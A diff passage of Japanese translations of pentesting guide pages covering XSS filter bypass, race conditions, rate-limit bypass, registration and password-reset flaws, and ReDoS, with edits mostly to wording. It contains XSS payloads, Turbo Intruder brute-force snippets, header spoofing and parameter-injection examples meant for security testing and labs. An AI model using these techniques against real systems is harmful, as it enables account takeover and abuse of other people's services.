+ファイアウォールの正規表現フィルターをバイパスするために、さまざまな技術が使用できます。例としては、大文字と小文字の交互使用、改行の追加、ペイロードのエンコーディングなどがあります。さまざまなバイパスのリソースは[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads)や[OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)で見つけることができます。以下の例は[この記事](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)から引用されています。
 ```bash
 <sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
 <<script>alert(XSS)</script> #prepending an additional "<"
diff --git a/src/pentesting-web/race-condition.md b/src/pentesting-web/race-condition.md
index 106daf81e..7c0569846 100644
--- a/src/pentesting-web/race-condition.md
+++ b/src/pentesting-web/race-condition.md
@@ -9,19 +9,19 @@
 
 レースコンディションを利用する際の主な障害は、**処理時間にほとんど差がない状態で複数のリクエストが同時に処理されることを確保すること—理想的には1ms未満**です。
 
-ここでは、リクエストを同期させるためのいくつかの技術を紹介します。
+ここでは、リクエストの同期に関するいくつかの技術を紹介します。
 
 #### HTTP/2 シングルパケット攻撃 vs. HTTP/1.1 ラストバイト同期
 
 - **HTTP/2**: 単一のTCP接続で2つのリクエストを送信することをサポートし、ネットワークのジッターの影響を軽減します。ただし、サーバー側の変動により、2つのリクエストでは一貫したレースコンディションの悪用には不十分な場合があります。
-- **HTTP/1.1 'ラストバイト同期'**: 20〜30のリクエストのほとんどの部分を事前に送信し、小さな断片を保持しておき、それを一緒に送信することで、サーバーへの同時到着を実現します。
+- **HTTP/1.1 'ラストバイト同期'**: 20-30のリクエストのほとんどの部分を事前に送信し、小さな断片を保持しておき、それを一緒に送信することで、サーバーへの同時到着を実現します。
 
 **ラストバイト同期の準備**には以下が含まれます：
 
 1. ストリームを終了せずに最終バイトを除いたヘッダーとボディデータを送信します。
 2. 初回送信後に100ms待機します。
 3. TCP_NODELAYを無効にして、Nagleのアルゴリズムを利用して最終フレームをバッチ処理します。
-4. 接続を温めるためにピングを送信します。
+4. 接続を温めるためにピングを行います。
 
 保持されたフレームのその後の送信は、Wiresharkを使用して確認できる単一パケットでの到着をもたらすべきです。この方法は、RC攻撃に通常関与しない静的ファイルには適用されません。
 
@@ -39,7 +39,7 @@ PHPのセッションハンドラーのようなフレームワークは、セ
 
 ## 攻撃の例
 
-- **Tubo Intruder - HTTP2 シングルパケット攻撃 (1エンドポイント)**: **Turbo intruder**にリクエストを送信できます（`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`）。リクエスト内の**`%s`**の値をブルートフォースしたいものに変更できます。例えば、`csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`のようにして、ドロップダウンから**`examples/race-single-packer-attack.py`**を選択します：
+- **Tubo Intruder - HTTP2 シングルパケット攻撃 (1エンドポイント)**: **Turbo intruder**にリクエストを送信できます（`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`）。リクエスト内の**`%s`**の値をブルートフォースしたい値に変更できます。例えば、`csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`のように。そして、ドロップダウンから**`examples/race-single-packer-attack.py`**を選択します：
 
 <figure><img src="../images/image (57).png" alt=""><figcaption></figcaption></figure>
 
@@ -50,7 +50,7 @@ for password in passwords:
 engine.queue(target.req, password, gate='race1')
 ```
 > [!WARNING]
-> ウェブがHTTP2をサポートしていない場合（HTTP1.1のみ）、`Engine.THREADED`または`Engine.BURP`を使用してください。`Engine.BURP2`の代わりに。
+> ウェブがHTTP2をサポートしていない場合（HTTP1.1のみ）、`Engine.BURP2`の代わりに`Engine.THREADED`または`Engine.BURP`を使用してください。
 
 - **Tubo Intruder - HTTP2シングルパケット攻撃（複数のエンドポイント）**: 1つのエンドポイントにリクエストを送信し、その後RCEをトリガーするために他のエンドポイントに複数のリクエストを送信する必要がある場合、`race-single-packet-attack.py`スクリプトを次のように変更できます:
 ```python
@@ -85,13 +85,13 @@ engine.openGate(currentAttempt)
 ```
 - **Repeater**でも、Burp Suiteの新しい「**Send group in parallel**」オプションを使用できます。
 - **limit-overrun**の場合、グループに**同じリクエストを50回**追加するだけで済みます。
-- **connection warming**のために、**グループ**の**最初**にウェブサーバーの非静的部分への**リクエスト**をいくつか**追加**することができます。
-- **delaying**プロセスのために、**1つのリクエストと別のリクエストの間**に2つのサブステートステップで**追加のリクエストを挿入**することができます。
-- **multi-endpoint** RCの場合、**隠れた状態**に送信される**リクエスト**を最初に送信し、その後に**隠れた状態を悪用する50のリクエスト**を送信することができます。
+- **connection warming**のために、**グループ**の**最初**にウェブサーバーの非静的部分への**リクエスト**を**追加**することができます。
+- **delaying**プロセスのために、**1つのリクエストと別のリクエストの間**に**追加のリクエストを挿入**することができます。
+- **multi-endpoint** RCの場合、**隠れた状態**に送信される**リクエスト**を開始し、その後に**隠れた状態を悪用する50のリクエスト**を送信することができます。
 
 <figure><img src="../images/image (58).png" alt=""><figcaption></figcaption></figure>
 
-- **Automated python script**: このスクリプトの目的は、ユーザーのメールを変更し、新しいメールの検証トークンが最後のメールに届くまで継続的に確認することです（これは、コード内でメールを変更できるRCが見られたためで、検証が古いメールに送信される可能性があるため、メールを示す変数が最初のもので既に populated されていました）。\
+- **自動化されたPythonスクリプト**: このスクリプトの目的は、ユーザーのメールアドレスを変更し、新しいメールの検証トークンが最後のメールに届くまで継続的に確認することです（これは、コード内でメールを変更できるRCが見られたためで、検証が古いメールに送信される可能性があるため、メールを示す変数が最初のもので既に設定されていました）。\
 「objetivo」という単語が受信したメールに見つかると、変更されたメールの検証トークンを受け取ったことがわかり、攻撃を終了します。
 ```python
 # https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
@@ -219,9 +219,9 @@ response = requests.get(url, verify=False)
 ```
 ### シングルパケット攻撃の改善
 
-元の研究では、この攻撃には1,500バイトの制限があると説明されています。しかし、[**この投稿**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)では、**IP層のフラグメンテーションを使用してシングルパケット攻撃の1,500バイトの制限をTCPの**65,535 Bウィンドウ制限に拡張する方法**が説明されています**（単一のパケットを複数のIPパケットに分割し、異なる順序で送信することで、すべてのフラグメントがサーバーに到達するまでパケットの再構成を防ぐことができます）。この技術により、研究者は約166msで10,000リクエストを送信することができました。&#x20;
+元の研究では、この攻撃には1,500バイトの制限があると説明されています。しかし、[**この投稿**](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)では、**IPレイヤーのフラグメンテーションを使用してシングルパケット攻撃の1,500バイトの制限をTCPの**65,535 Bウィンドウ制限に拡張する方法**が説明されています**（1つのパケットを複数のIPパケットに分割し、異なる順序で送信することで、すべてのフラグメントがサーバーに到達するまでパケットの再構成を防ぐことができます）。この技術により、研究者は約166msで10,000リクエストを送信することができました。&#x20;
 
-この改善により、同時に到着する必要がある数百/数千のパケットを必要とするRC攻撃がより信頼性の高いものになりますが、いくつかのソフトウェア制限がある可能性もあります。Apache、Nginx、Goなどの一般的なHTTPサーバーには、`SETTINGS_MAX_CONCURRENT_STREAMS`の設定がそれぞれ100、128、250に厳格に制限されています。しかし、NodeJSやnghttp2のような他のサーバーは無制限です。\
+この改善により、同時に到着する必要がある数百または数千のパケットを必要とするRC攻撃がより信頼性の高いものになりますが、ソフトウェアの制限がある可能性もあります。Apache、Nginx、Goなどの一般的なHTTPサーバーには、`SETTINGS_MAX_CONCURRENT_STREAMS`の設定がそれぞれ100、128、250に厳格に制限されています。しかし、NodeJSやnghttp2のような他のサーバーは無制限です。\
 これは基本的に、Apacheが単一のTCP接続から100のHTTP接続のみを考慮することを意味し（このRC攻撃を制限します）。
 
 この技術を使用したいくつかの例は、リポジトリ[https://github.com/Ry0taK/first-sequence-sync/tree/main](https://github.com/Ry0taK/first-sequence-sync/tree/main)で見つけることができます。
@@ -231,7 +231,7 @@ response = requests.get(url, verify=False)
 前の研究の前に、RCを引き起こすためにパケットをできるだけ早く送信しようとしたいくつかのペイロードがありました。
 
 - **リピーター:** 前のセクションの例を確認してください。
-- **侵入者**: **リクエスト**を**侵入者**に送信し、**オプションメニュー内でスレッド数を**30**に設定し、ペイロードとして**Null payloads**を選択し、**30**を生成します。
+- **侵入者**: **リクエスト**を**侵入者**に送信し、**オプションメニュー内でスレッド数を**30**に設定し、ペイロードとして**Null payloads**を選択し、**30を生成します**。
 - **ターボ侵入者**
 ```python
 def queueRequests(target, wordlists):
@@ -283,25 +283,25 @@ asyncio.run(main())
 
 ### Limit-overrun / TOCTOU
 
-これは、**アクションを実行できる回数を制限する場所に**現れる**脆弱性**の最も基本的なタイプのレースコンディションです。例えば、ウェブストアで同じ割引コードを何度も使用することです。非常に簡単な例は[**このレポート**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43)や[**このバグ**](https://hackerone.com/reports/759247)**に見られます。**
+これは、**アクションを実行できる回数を制限する場所に現れる** **脆弱性**の最も基本的なタイプのレースコンディションです。例えば、ウェブストアで同じ割引コードを何度も使用することです。非常に簡単な例は[**このレポート**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43)や[**このバグ**](https://hackerone.com/reports/759247)**に見られます。**
 
 この種の攻撃には多くのバリエーションがあります。例えば：
 
 - ギフトカードを複数回利用する
 - 商品を複数回評価する
 - アカウント残高を超えて現金を引き出したり転送したりする
-- 単一のCAPTCHA解決策を再利用する
+- 単一のCAPTCHAソリューションを再利用する
 - アンチブルートフォースレート制限を回避する
 
 ### **Hidden substates**
 
-複雑なレースコンディションを悪用することは、隠れたまたは**意図しないマシンのサブステート**と相互作用するための短い機会を利用することを含むことがよくあります。これにアプローチする方法は次のとおりです：
+複雑なレースコンディションを悪用することは、隠れたまたは**意図しないマシンのサブステート**と相互作用する短い機会を利用することを含むことがよくあります。これにアプローチする方法は次のとおりです：
 
 1. **潜在的な隠れたサブステートを特定する**
 - ユーザープロファイルやパスワードリセットプロセスなど、重要なデータを変更または相互作用するエンドポイントを特定することから始めます。以下に焦点を当てます：
 - **ストレージ**：クライアント側のデータを扱うエンドポイントよりも、サーバー側の永続データを操作するエンドポイントを優先します。
-- **アクション**：新しいデータを追加するよりも、既存のデータを変更する操作を探します。これらの方が悪用可能な条件を作成する可能性が高いです。
-- **キー**：成功した攻撃は通常、同じ識別子（例：ユーザー名やリセットトークン）に基づく操作を含みます。
+- **アクション**：既存のデータを変更する操作を探します。これは新しいデータを追加する操作よりも、悪用可能な条件を作成する可能性が高いです。
+- **キーイング**：成功した攻撃は通常、同じ識別子（例：ユーザー名やリセットトークン）に基づく操作を含みます。
 2. **初期プロービングを実施する**
 - 特定したエンドポイントに対してレースコンディション攻撃をテストし、期待される結果からの逸脱を観察します。予期しない応答やアプリケーションの動作の変化は脆弱性を示す可能性があります。
 3. **脆弱性を示す**
@@ -323,31 +323,31 @@ asyncio.run(main())
 
 ## Hidden substates ケーススタディ
 
-### アイテムを支払って追加する
+### 支払いとアイテムの追加
 
-この[**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation)をチェックして、**支払い**を行い、**追加のアイテムを**支払わずに**追加する方法を確認してください。**
+この[**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation)をチェックして、**支払い**を行い、**追加の**アイテムを**支払わずに追加する**方法を確認してください。
 
-### 他のメールを確認する
+### 他のメールの確認
 
 アイデアは、**メールアドレスを確認し、同時に別のものに変更する**ことで、プラットフォームが変更された新しいものを確認するかどうかを調べることです。
 
-### 2つのメールアドレスにメールを変更する Cookieベース
+### 2つのメールアドレスへのメール変更 Cookieベース
 
-[**この研究**](https://portswigger.net/research/smashing-the-state-machine)によると、Gitlabはこの方法で乗っ取られる脆弱性があり、**1つのメールのメール確認トークンを別のメールに**送信する可能性があります。
+[**この研究**](https://portswigger.net/research/smashing-the-state-machine)によると、Gitlabはこの方法で乗っ取られる脆弱性があり、**1つのメールのメール確認トークンを別のメールに送信する可能性があります**。
 
 **これを試すには** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **をチェックしてください。**
 
 ### 隠れたデータベースの状態 / 確認バイパス
 
-**2つの異なる書き込み**が**データベース内に情報を追加する**ために使用される場合、**最初のデータのみがデータベースに書き込まれた**小さな時間の部分があります。例えば、ユーザーを作成する際に、**ユーザー名**と**パスワード**が**書き込まれ**、**新しく作成されたアカウントを確認するためのトークン**が書き込まれます。これは、**アカウントを確認するためのトークンがnullである**小さな時間があることを意味します。
+**2つの異なる書き込み**が**データベース**内に**情報**を**追加する**ために使用される場合、**最初のデータのみがデータベースに書き込まれた**小さな時間の部分があります。例えば、ユーザーを作成する際に、**ユーザー名**と**パスワード**が**書き込まれ**、**新しく作成されたアカウントを確認するためのトークン**が書き込まれます。これは、短い時間の間に**アカウントを確認するためのトークンがnullである**ことを意味します。
 
-したがって、**アカウントを登録し、空のトークン**（`token=`または`token[]=`または他のバリエーション）を使用してアカウントをすぐに確認するために複数のリクエストを送信することで、**メールを制御していないアカウントを確認する**ことができる可能性があります。
+したがって、**アカウントを登録し、空のトークン**（`token=`または`token[]=`またはその他のバリエーション）を使用してアカウントをすぐに確認するために複数のリクエストを送信することで、メールを制御していないアカウントを**確認する**ことができる可能性があります。
 
 **これを試すには** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **をチェックしてください。**
 
-### 2FAをバイパスする
+### 2FAのバイパス
 
-以下の擬似コードは、セッションが作成されている間に**2FAが強制されていない**ため、レースコンディションに脆弱です：
+以下の擬似コードは、非常に短い時間の間に**2FAが強制されていない**ため、レースコンディションに脆弱です：
 ```python
 session['userid'] = user.userid
 if user.mfa_enabled:
@@ -357,20 +357,20 @@ session['enforce_mfa'] = True
 ```
 ### OAuth2 永続的な持続性
 
-いくつかの [**OAUth プロバイダー**](https://en.wikipedia.org/wiki/List_of_OAuth_providers) があります。これらのサービスを使用すると、アプリケーションを作成し、プロバイダーが登録したユーザーを認証できます。そのためには、**クライアント**が **あなたのアプリケーション** に **いくつかのデータへのアクセスを許可する必要があります** **OAUth プロバイダー** 内の。\
-ここまでのところ、google/linkedin/github などの一般的なログインで、"_アプリケーション \<InsertCoolName> があなたの情報にアクセスしたいと考えています。許可しますか？_" というページが表示されます。
+いくつかの [**OAUth プロバイダー**](https://en.wikipedia.org/wiki/List_of_OAuth_providers) があります。これらのサービスを使用すると、アプリケーションを作成し、プロバイダーが登録したユーザーを認証できます。そのためには、**クライアント**が**あなたのアプリケーション**に**OAUth プロバイダー**内のデータにアクセスすることを**許可する**必要があります。\
+ここまでのところ、google/linkedin/githubなどの一般的なログインで、"_アプリケーション \<InsertCoolName> があなたの情報にアクセスしたいと考えています。許可しますか？_"というページが表示されます。
 
 #### `authorization_code` におけるレースコンディション
 
-**問題** は、あなたが **それを受け入れたとき** に発生し、悪意のあるアプリケーションに **`authorization_code`** が自動的に送信されることです。次に、この **アプリケーションは OAUth サービスプロバイダーのレースコンディションを悪用して、あなたのアカウントの **`authorization_code`** から複数の AT/RT** (_認証トークン/リフレッシュトークン_) を生成します。基本的に、あなたがアプリケーションにデータへのアクセスを許可したという事実を悪用して **複数のアカウントを作成します**。その後、もしあなたが **アプリケーションにデータへのアクセスを許可しなくなった場合、1対の AT/RT は削除されますが、他のものはまだ有効です**。
+**問題**は、あなたが**それを受け入れる**と、自動的に悪意のあるアプリケーションに**`authorization_code`**が送信されるときに発生します。その後、この**アプリケーションは OAUth サービスプロバイダーのレースコンディションを悪用して、あなたのアカウントの**`authorization_code`**から複数の AT/RT** (_認証トークン/リフレッシュトークン_) を生成します。基本的に、あなたがアプリケーションにデータへのアクセスを許可した事実を悪用して、**複数のアカウントを作成します**。その後、もしあなたが**アプリケーションにデータへのアクセスを許可しなくなった場合、1対の AT/RT は削除されますが、他のものはまだ有効です**。
 
 #### `Refresh Token` におけるレースコンディション
 
-一度 **有効な RT** を **取得すると、複数の AT/RT を生成するためにそれを悪用しようとすることができます**。さらに、**ユーザーが悪意のあるアプリケーションにデータへのアクセスの権限をキャンセルしても、**複数の RT はまだ有効です**。
+一度**有効な RT**を**取得すると、複数の AT/RT**を生成するために**それを悪用しようとすることができます**。さらに、**ユーザーが悪意のあるアプリケーションにデータへのアクセスの権限をキャンセルしても、**複数の RT はまだ有効です**。
 
 ## **WebSockets における RC**
 
-[**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) では、**並行して** WebSocket メッセージを送信して **Web Sockets におけるレースコンディションを悪用する** PoC を Java で見つけることができます。
+[**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) では、**Web Sockets におけるレースコンディションを悪用するために、並行して WebSocket メッセージを送信する Java の PoC**を見つけることができます。
 
 ## 参考文献
 
diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md
index 07525f661..0a8f9f474 100644
--- a/src/pentesting-web/rate-limit-bypass.md
+++ b/src/pentesting-web/rate-limit-bypass.md
@@ -6,7 +6,7 @@
 
 ### 類似エンドポイントの探索
 
-ターゲットエンドポイントのバリエーションに対してブルートフォース攻撃を試みるべきです。例えば、`/api/v3/sign-up`の代替として、`/Sing-up`、`/SignUp`、`/singup`、`/api/v1/sign-up`、`/api/sign-up`などがあります。
+ターゲットエンドポイントのバリエーションに対してブルートフォース攻撃を試みるべきです。例えば、`/api/v3/sign-up`のようなエンドポイントに加え、`/Sing-up`、`/SignUp`、`/singup`、`/api/v1/sign-up`、`/api/sign-up`などの代替案も含まれます。
 
 ### コードやパラメータに空白文字を組み込む
 
@@ -38,7 +38,7 @@ X-Forwarded-For: 127.0.0.1
 
 ### 各試行の前にアカウントにログインする
 
-各試行の前、または一連の試行の前にアカウントにログインすることで、レート制限カウンターをリセットできる場合があります。これは特にログイン機能をテストする際に便利です。Burp Suiteのようなツールでピッチフォーク攻撃を利用し、数回の試行ごとに資格情報を回転させ、リダイレクトをマークすることで、レート制限カウンターを効果的に再起動できます。
+各試行の前、または試行のセットごとにアカウントにログインすることで、レート制限カウンターをリセットできる場合があります。これは特にログイン機能をテストする際に有用です。Burp Suiteのようなツールでピッチフォーク攻撃を利用し、数回の試行ごとに資格情報を回転させ、リダイレクトをマークすることで、レート制限カウンターを効果的に再起動できます。
 
 ### プロキシネットワークの利用
 
@@ -46,10 +46,10 @@ X-Forwarded-For: 127.0.0.1
 
 ### 異なるアカウントやセッションに攻撃を分散させる
 
-ターゲットシステムがアカウントまたはセッションごとにレート制限を適用する場合、攻撃やテストを複数のアカウントやセッションに分散させることで、検出を回避するのに役立ちます。このアプローチは、複数のアイデンティティやセッショントークンを管理する必要がありますが、許容範囲内に負荷を効果的に分散させることができます。
+ターゲットシステムがアカウントまたはセッションごとにレート制限を適用する場合、攻撃やテストを複数のアカウントやセッションに分散させることで、検出を回避するのに役立ちます。このアプローチは、複数のアイデンティティやセッショントークンを管理する必要がありますが、許容範囲内に負荷を分散させることができます。
 
 ### 続けて試す
 
-レート制限が存在していても、有効なOTPが送信されたときに応答が異なるかどうかを確認することをお勧めします。[**この投稿**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732)では、バグハンターが20回の不成功な試行の後に401で応答されるとレート制限が発動しても、有効なものが送信された場合には200の応答が受信されることを発見しました。
+レート制限が存在していても、有効なOTPが送信されたときに応答が異なるかどうかを確認することをお勧めします。[**この投稿**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732)では、バグハンターが20回の不成功な試行の後にレート制限がトリガーされ、401で応答された場合でも、有効なものが送信された場合には200の応答が受信されたことを発見しました。
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md
index 44e133678..2e01b9dda 100644
--- a/src/pentesting-web/registration-vulnerabilities.md
+++ b/src/pentesting-web/registration-vulnerabilities.md
@@ -98,7 +98,7 @@ email=victim@mail.com|hacker@mail.com
 ### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
 
 パスワードリセットトークンは毎回ランダムに生成され、一意であるべきです。\
-トークンが期限切れになるか、常に同じかを確認してください。場合によっては、生成アルゴリズムが弱く、推測可能です。以下の変数がアルゴリズムで使用される可能性があります。
+トークンが期限切れになるか、常に同じかを確認してください。場合によっては、生成アルゴリズムが弱く、推測可能です。以下の変数がアルゴリズムによって使用される可能性があります。
 
 - タイムスタンプ
 - ユーザーID
@@ -121,7 +121,7 @@ email=victim@mail.com|hacker@mail.com
 
 1. 被害者のユーザー名と同一のユーザー名でシステムに登録しますが、ユーザー名の前後に空白を挿入します。例：`"admin "`
 2. 悪意のあるユーザー名でパスワードリセットをリクエストします。
-3. あなたのメールに送信されたトークンを使用して被害者のパスワードをリセットします。
+3. あなたのメールに送信されたトークンを使用して、被害者のパスワードをリセットします。
 4. 新しいパスワードで被害者のアカウントに接続します。
 
 プラットフォームCTFdはこの攻撃に対して脆弱でした。\
diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md
index 8b155b393..1454e4d4f 100644
--- a/src/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -4,7 +4,7 @@
 
 # 正規表現サービス拒否 (ReDoS)
 
-**正規表現サービス拒否 (ReDoS)** は、誰かが正規表現（テキスト内のパターンを検索および一致させる方法）の動作の弱点を利用する場合に発生します。正規表現が使用されると、特に処理するテキストのサイズが大きくなると、非常に遅くなることがあります。この遅さは、テキストサイズがわずかに増加するだけで急速に悪化することがあります。攻撃者はこの問題を利用して、正規表現を使用するプログラムが長時間正常に動作しないようにすることができます。
+**正規表現サービス拒否 (ReDoS)** は、誰かが正規表現（テキスト内のパターンを検索して一致させる方法）の動作の弱点を利用する場合に発生します。正規表現が使用されると、特に処理するテキストのサイズが大きくなると、非常に遅くなることがあります。この遅さは、テキストサイズがわずかに増加するだけで急速に悪化することがあります。攻撃者はこの問題を利用して、正規表現を使用するプログラムが長時間正常に動作しないようにすることができます。
 
 ## 問題のある正規表現のナイーブアルゴリズム
 
@@ -12,7 +12,7 @@
 
 ## 悪意のある正規表現 <a href="#evil-regexes" id="evil-regexes"></a>
 
-悪意のある正規表現パターンとは、**作成された入力に引っかかり、DoSを引き起こす**ことができるものです。悪意のある正規表現パターンは、通常、繰り返しを伴うグループ化や、繰り返しまたは重複を含む選択肢を持っています。悪意のあるパターンのいくつかの例は次のとおりです：
+悪意のある正規表現パターンとは、**作成された入力に引っかかり、DoSを引き起こす**ことができるものです。悪意のある正規表現パターンは、通常、繰り返しを伴うグループ化や、繰り返しまたは交互の重複を含んでいます。悪意のあるパターンのいくつかの例は次のとおりです：
 
 - (a+)+
 - ([a-zA-Z]+)\*
@@ -30,8 +30,8 @@ CTF（またはバグバウンティ）では、**正規表現が一致する機
 
 - [**この投稿**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) では、このReDoSルールを見つけることができます: `^(?=<flag>)((.*)*)*salt$`
 - 例: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
-- [**この解説**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) では、次のものが見つかります: `<flag>(((((((.*)*)*)*)*)*)*)!`
-- [**この解説**](https://ctftime.org/writeup/25869) では、次のように使用されました: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
+- [**この解説**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) では、次のものを見つけることができます: `<flag>(((((((.*)*)*)*)*)*)*)!`
+- [**この解説**](https://ctftime.org/writeup/25869) では、次のものを使用しました: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
 
 ### ReDoSの入力と正規表現の制御
 
diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md
index 03e86b62e..c459fcc9a 100644
--- a/src/pentesting-web/reset-password.md
+++ b/src/pentesting-web/reset-password.md
@@ -1,4 +1,4 @@
-# リセット/忘れたパスワードのバイパス
+# パスワードリセット/忘れたパスワードのバイパス
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -23,11 +23,11 @@
 - **参考文献**:
 - [パスワードリセットポイズニングに関するAcunetixの記事](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
 
-## **メールパラメータを操作してパスワードリセット**
+## **メールパラメータを操作してのパスワードリセット**
 
 攻撃者は、リセットリンクを誘導するために追加のメールパラメータを追加することで、パスワードリセットリクエストを操作できます。
 
-- &を使用して攻撃者のメールを2番目のパラメータとして追加します。
+- 攻撃者のメールを第二のパラメータとして&を使用して追加します。
 ```php
 POST /resetPassword
 [...]
@@ -85,19 +85,19 @@ POST /api/changepass
 [...]
 ("form": {"email":"victim@email.tld","password":"12345678"})
 ```
-- **緩和手順**:
+- **緩和手段**:
 - 厳格なパラメータ検証と認証チェックを確保する。
 - 不審な活動を検出し対応するために、堅牢なログ記録と監視を実装する。
-- **参照**:
+- **参考文献**:
 - [Full Account Takeover via API Parameter Manipulation](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
 
 ## **レート制限なし: メールボンピング**
 
-- パスワードリセットリクエストにレート制限がないと、メールボンピングが発生し、ユーザーがリセットメールで圧倒される可能性がある。
-- **緩和手順**:
+- パスワードリセットリクエストにレート制限がないと、ユーザーがリセットメールで圧倒されるメールボンピングが発生する可能性がある。
+- **緩和手段**:
 - IPアドレスまたはユーザーアカウントに基づいてレート制限を実装する。
 - 自動化された悪用を防ぐためにCAPTCHAチャレンジを使用する。
-- **参照**:
+- **参考文献**:
 - [HackerOne Report 280534](https://hackerone.com/reports/280534)
 
 ## **パスワードリセットトークンの生成方法を調べる**
@@ -106,10 +106,10 @@ POST /api/changepass
 - タイムスタンプに基づく
 - ユーザーIDに基づく
 - ユーザーのメールに基づく
-- 名前と姓に基づく
+- 名字と姓に基づく
 - 生年月日に基づく
-- 暗号学に基づく
-- **緩和手順**:
+- 暗号に基づく
+- **緩和手段**:
 - トークン生成に強力な暗号化手法を使用する。
 - 予測可能性を防ぐために十分なランダム性と長さを確保する。
 - **ツール**: Burp Sequencerを使用してトークンのランダム性を分析する。
@@ -122,51 +122,51 @@ POST /api/changepass
 uuid-insecurities.md
 {{#endref}}
 
-- **緩和手順**:
+- **緩和手段**:
 - ランダム性のためにGUIDバージョン4を使用するか、他のバージョンに対して追加のセキュリティ対策を実装する。
 - **ツール**: [guidtool](https://github.com/intruder-io/guidtool)を使用してGUIDを分析および生成する。
 
 ## **レスポンス操作: 悪いレスポンスを良いものに置き換える**
 
 - エラーメッセージや制限を回避するためにHTTPレスポンスを操作する。
-- **緩和手順**:
+- **緩和手段**:
 - レスポンスの整合性を確保するためにサーバー側のチェックを実装する。
 - 中間者攻撃を防ぐためにHTTPSのような安全な通信チャネルを使用する。
-- **参照**:
+- **参考文献**:
 - [Critical Bug in Live Bug Bounty Event](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
 
 ## **期限切れトークンの使用**
 
 - 期限切れのトークンがパスワードリセットにまだ使用できるかどうかをテストする。
-- **緩和手順**:
+- **緩和手段**:
 - 厳格なトークンの有効期限ポリシーを実装し、サーバー側でトークンの有効期限を検証する。
 
-## **ブルートフォースパスワードリセットトークン**
+## **パスワードリセットトークンのブルートフォース**
 
 - BurpsuiteやIP-Rotatorのようなツールを使用してリセットトークンをブルートフォースし、IPベースのレート制限を回避しようとする。
-- **緩和手順**:
+- **緩和手段**:
 - 堅牢なレート制限とアカウントロックアウトメカニズムを実装する。
 - ブルートフォース攻撃を示す不審な活動を監視する。
 
 ## **トークンを使用してみる**
 
 - 攻撃者のリセットトークンが被害者のメールと一緒に使用できるかどうかをテストする。
-- **緩和手順**:
+- **緩和手段**:
 - トークンがユーザーセッションまたは他のユーザー固有の属性にバインドされていることを確認する。
 
 ## **ログアウト/パスワードリセット時のセッション無効化**
 
 - ユーザーがログアウトまたはパスワードをリセットしたときにセッションが無効化されることを確認する。
-- **緩和手順**:
+- **緩和手段**:
 - 適切なセッション管理を実装し、ログアウトまたはパスワードリセット時にすべてのセッションが無効化されることを確保する。
 
 ## **ログアウト/パスワードリセット時のセッション無効化**
 
 - リセットトークンには、有効期限が設定され、その後無効になるべきである。
-- **緩和手順**:
+- **緩和手段**:
 - リセットトークンの合理的な有効期限を設定し、サーバー側で厳格に施行する。
 
-## 参照
+## 参考文献
 
 - [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
 
diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md
index 39eb5f05b..d5ea75e20 100644
--- a/src/pentesting-web/reverse-tab-nabbing.md
+++ b/src/pentesting-web/reverse-tab-nabbing.md
@@ -2,24 +2,24 @@
 
 # 説明
 
